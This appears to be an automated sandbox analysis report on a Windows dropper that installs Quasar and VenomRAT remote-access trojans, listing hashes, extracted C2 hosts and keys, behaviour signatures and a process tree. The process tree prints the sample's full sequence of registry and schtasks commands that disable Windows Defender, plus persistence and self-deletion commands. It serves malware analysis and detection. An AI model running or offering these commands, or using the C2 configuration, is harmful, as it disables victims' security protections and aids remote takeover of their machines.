Analysis

  • max time kernel
    4294191s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    10-03-2022 18:45

General

  • Target

    50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe

  • Size

    9.4MB

  • MD5

    456b54d87d22a2c59cb44ae3e29940a3

  • SHA1

    4eb16df152f774f3794a6ca8c1cd1a3e72bc7232

  • SHA256

    50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6

  • SHA512

    8213a726aeee1519599e6884f6ad4564d5df066251267d630af4e601bef2b726a2445855e0a609f088c26c84b4cae69e26cc3d744668bf882ff46cb29684cc6d

Malware Config

Extracted

Family

quasar

Version

2.1.0.0

Botnet

Windows Security Notification

C2

minecraftgaming009-61323.portmap.io:61323

Mutex

VNM_MUTEX_c2q7y2ayYutZ2XaYe7

Attributes
  • encryption_key

    1oSvdU99XhcwnNYl3rB8

  • install_name

    Windows Security Notification.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Security Notification

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Steam

C2

Minecrafthosting6969-35389.portmap.io:35389

Mutex

EAojkiVMQ0sDtyACyi

Attributes
  • encryption_key

    P5xHRD8P5ncR2T1uRpgp

  • install_name

    Steam.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Steam

  • subdirectory

    SubDir

Signatures

  • Contains code to disable Windows Defender 13 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Quasar Payload 14 IoCs
  • Quasar RAT 4 IoCs

    Quasar is an open source Remote Access Tool.

  • VenomRAT

    VenomRAT is a modified version of QuasarRAT with some added features, such as rootkit and stealer capabilites.

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 2 IoCs
  • Executes dropped EXE 10 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Detects Pyinstaller 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
    "C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe"
    1⤵
    • Quasar RAT
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Users\Admin\AppData\Local\Temp\Abxy.exe
      "C:\Users\Admin\AppData\Local\Temp\Abxy.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:652
      • C:\Users\Admin\AppData\Local\Temp\Abxy.exe
        "C:\Users\Admin\AppData\Local\Temp\Abxy.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1620
    • C:\Users\Admin\AppData\Local\Temp\Ygri.exe
      "C:\Users\Admin\AppData\Local\Temp\Ygri.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:296
      • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
        "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=
        3⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:1240
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
          4⤵
            PID:652
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c compile.bat
              5⤵
                PID:1976
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
              4⤵
                PID:1508
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c compile.bat
                  5⤵
                    PID:1148
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:528
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                  4⤵
                    PID:1888
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1280
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:1528
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                        4⤵
                          PID:1644
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                          4⤵
                            PID:784
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            4⤵
                              PID:1904
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                              4⤵
                                PID:1700
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                4⤵
                                  PID:1988
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                  4⤵
                                    PID:1308
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                    4⤵
                                      PID:748
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
                                      4⤵
                                        PID:1508
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                        4⤵
                                          PID:1212
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                          4⤵
                                            PID:1304
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                            4⤵
                                              PID:1532
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                              4⤵
                                                PID:332
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                4⤵
                                                  PID:1888
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                  4⤵
                                                    PID:836
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                    4⤵
                                                      PID:1116
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                      4⤵
                                                        PID:1700
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                        4⤵
                                                          PID:1532
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                          4⤵
                                                            PID:2032
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                            4⤵
                                                              PID:960
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                              4⤵
                                                                PID:436
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                4⤵
                                                                  PID:1700
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                  4⤵
                                                                    PID:1884
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                    4⤵
                                                                      PID:668
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                      4⤵
                                                                        PID:2032
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                        4⤵
                                                                          PID:904
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                          4⤵
                                                                            PID:1988
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                            4⤵
                                                                            • Modifies security service
                                                                            PID:1332
                                                                      • C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:572
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 1080
                                                                          3⤵
                                                                          • Loads dropped DLL
                                                                          • Program crash
                                                                          PID:1376
                                                                      • C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1484
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe" /rl HIGHEST /f
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:908
                                                                        • C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe
                                                                          "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1060
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f
                                                                            4⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:1908
                                                                      • C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Windows security modification
                                                                        • Adds Run key to start application
                                                                        • Drops file in System32 directory
                                                                        • Modifies system certificate store
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:300
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe" /rl HIGHEST /f
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:840
                                                                        • C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
                                                                          "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in System32 directory
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1924
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f
                                                                            4⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:632
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\URFSHxQetleU.bat" "
                                                                            4⤵
                                                                              PID:268
                                                                              • C:\Windows\SysWOW64\chcp.com
                                                                                chcp 65001
                                                                                5⤵
                                                                                  PID:960
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping -n 10 localhost
                                                                                  5⤵
                                                                                  • Runs ping.exe
                                                                                  PID:1508
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1512
                                                                                4⤵
                                                                                • Loads dropped DLL
                                                                                • Program crash
                                                                                PID:828
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" Get-MpPreference -verbose
                                                                              3⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:964
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                                                                              3⤵
                                                                                PID:1300
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*
                                                                                  4⤵
                                                                                  • Deletes itself
                                                                                  PID:1340
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\ASQ53bPd3e32.bat" "
                                                                                3⤵
                                                                                • Loads dropped DLL
                                                                                PID:1520
                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                  chcp 65001
                                                                                  4⤵
                                                                                    PID:1968
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping -n 10 localhost
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:964
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2008

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v6

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • memory/296-96-0x0000000004B60000-0x0000000004B61000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/296-91-0x0000000073F60000-0x000000007464E000-memory.dmp

                                                                              Filesize

                                                                              6.9MB

                                                                            • memory/296-79-0x0000000000AE0000-0x0000000000DDE000-memory.dmp

                                                                              Filesize

                                                                              3.0MB

                                                                            • memory/296-92-0x0000000000AE0000-0x0000000000DDE000-memory.dmp

                                                                              Filesize

                                                                              3.0MB

                                                                            • memory/300-94-0x0000000073F60000-0x000000007464E000-memory.dmp

                                                                              Filesize

                                                                              6.9MB

                                                                            • memory/300-80-0x0000000000180000-0x0000000000216000-memory.dmp

                                                                              Filesize

                                                                              600KB

                                                                            • memory/300-97-0x0000000000660000-0x0000000000661000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/572-78-0x0000000000010000-0x0000000000018000-memory.dmp

                                                                              Filesize

                                                                              32KB

                                                                            • memory/572-90-0x00000000757C1000-0x00000000757C3000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/572-93-0x0000000073F60000-0x000000007464E000-memory.dmp

                                                                              Filesize

                                                                              6.9MB

                                                                            • memory/572-98-0x0000000001EF0000-0x0000000001EF1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/652-160-0x000007FEFB7C1000-0x000007FEFB7C3000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/964-133-0x00000000022C0000-0x0000000002F0A000-memory.dmp

                                                                              Filesize

                                                                              12.3MB

                                                                            • memory/964-132-0x000000006E130000-0x000000006E6DB000-memory.dmp

                                                                              Filesize

                                                                              5.7MB

                                                                            • memory/964-135-0x000000006E130000-0x000000006E6DB000-memory.dmp

                                                                              Filesize

                                                                              5.7MB

                                                                            • memory/964-136-0x00000000022C0000-0x0000000002F0A000-memory.dmp

                                                                              Filesize

                                                                              12.3MB

                                                                            • memory/964-134-0x00000000022C0000-0x0000000002F0A000-memory.dmp

                                                                              Filesize

                                                                              12.3MB

                                                                            • memory/1060-102-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp

                                                                              Filesize

                                                                              9.9MB

                                                                            • memory/1060-103-0x000000001AE70000-0x000000001AE72000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/1060-101-0x00000000009C0000-0x00000000009E4000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/1240-116-0x000000001B2B0000-0x000000001B5F2000-memory.dmp

                                                                              Filesize

                                                                              3.3MB

                                                                            • memory/1240-117-0x00000000002D0000-0x00000000002D6000-memory.dmp

                                                                              Filesize

                                                                              24KB

                                                                            • memory/1240-141-0x000000001AF10000-0x000000001AF42000-memory.dmp

                                                                              Filesize

                                                                              200KB

                                                                            • memory/1240-142-0x000000001B5F0000-0x000000001B692000-memory.dmp

                                                                              Filesize

                                                                              648KB

                                                                            • memory/1240-143-0x000000001B220000-0x000000001B228000-memory.dmp

                                                                              Filesize

                                                                              32KB

                                                                            • memory/1240-139-0x0000000000A10000-0x0000000000A1C000-memory.dmp

                                                                              Filesize

                                                                              48KB

                                                                            • memory/1240-138-0x0000000000DF0000-0x0000000000E20000-memory.dmp

                                                                              Filesize

                                                                              192KB

                                                                            • memory/1240-140-0x000000001AEF0000-0x000000001AF0A000-memory.dmp

                                                                              Filesize

                                                                              104KB

                                                                            • memory/1240-124-0x000000001A890000-0x000000001A940000-memory.dmp

                                                                              Filesize

                                                                              704KB

                                                                            • memory/1240-123-0x000000001B230000-0x000000001B232000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/1240-111-0x0000000000E30000-0x000000000110A000-memory.dmp

                                                                              Filesize

                                                                              2.9MB

                                                                            • memory/1240-113-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp

                                                                              Filesize

                                                                              9.9MB

                                                                            • memory/1484-73-0x0000000001280000-0x00000000012A4000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/1484-74-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp

                                                                              Filesize

                                                                              9.9MB

                                                                            • memory/1484-77-0x00000000011C0000-0x000000000122A000-memory.dmp

                                                                              Filesize

                                                                              424KB

                                                                            • memory/1484-95-0x000000001B190000-0x000000001B192000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/1924-114-0x0000000004840000-0x0000000004841000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/1924-55-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp

                                                                              Filesize

                                                                              9.9MB

                                                                            • memory/1924-110-0x0000000000990000-0x0000000000A26000-memory.dmp

                                                                              Filesize

                                                                              600KB

                                                                            • memory/1924-54-0x00000000008F0000-0x0000000001268000-memory.dmp

                                                                              Filesize

                                                                              9.5MB

                                                                            • memory/1924-112-0x0000000073F60000-0x000000007464E000-memory.dmp

                                                                              Filesize

                                                                              6.9MB

                                                                            • memory/1924-56-0x00000000002E0000-0x00000000002E2000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/2008-164-0x0000000000BE0000-0x0000000000C76000-memory.dmp

                                                                              Filesize

                                                                              600KB

                                                                            • memory/2008-165-0x0000000073F60000-0x000000007464E000-memory.dmp

                                                                              Filesize

                                                                              6.9MB

                                                                            • memory/2008-166-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                                                              Filesize

                                                                              4KB